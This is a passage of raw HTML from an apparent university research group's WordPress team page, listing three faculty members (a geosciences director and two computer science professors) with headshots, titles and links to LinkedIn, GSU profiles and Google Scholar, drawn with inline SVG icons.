h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c5\" class=\"d-block style-973 style-local-182-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-cropped-cropped-cropped-headshot-1-e1651208089645-2-e1697201737742.jpg\" class=\"wp-image-1697 style-973-image style-local-182-c5-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c5-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c6\" class=\"h-global-transition-all h-heading style-974 style-local-182-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Chetan Tiwari</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c7\" class=\"h-text h-text-component style-975 style-local-182-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Director</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c8\" class=\"h-text h-text-component style-976 style-local-182-c8 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c9\" class=\"style-977 style-local-182-c9 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/chetan-tiwari/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=C5PVPkoAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c10-outer\">\n            <div data-colibri-id=\"182-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c11\" class=\"d-block style-978 style-local-182-c11 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Portrait-1-e1697202215204.jpeg\" class=\"wp-image-1701 style-978-image style-local-182-c11-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-978-frameImage style-local-182-c11-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c12\" class=\"h-global-transition-all h-heading style-974 style-local-182-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c12\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Armin Mikler</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c13\" class=\"h-text h-text-component style-975 style-local-182-c13 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p> Chair and Professor\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c14\" class=\"h-text h-text-component style-976 style-local-182-c14 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c15\" class=\"style-979 style-local-182-c15 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/armin-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=41ckZZsAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c16-outer\">\n            <div data-colibri-id=\"182-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c16 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c17\" class=\"d-block style-980 style-local-182-c17 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/sunderraman1.jpeg\" class=\"wp-image-692 style-980-image style-local-182-c17-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-980-frameImage style-local-182-c17-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c18\" class=\"h-global-transition-all h-heading style-974 style-local-182-c18 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c18\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raj Sunderraman</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c19\" class=\"h-text h-text-component style-975 style-local-182-c19 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Associate Chair and Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c20\" class=\"h-text h-text-component style-976 style-local-182-c20 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c21\" class=\"style-981 style-local-182-c21 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/raj-sunderraman-a5591bb2/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/raj-sunderraman/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?hl=en&amp;user=Wlxc9FEAAAAJ\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" 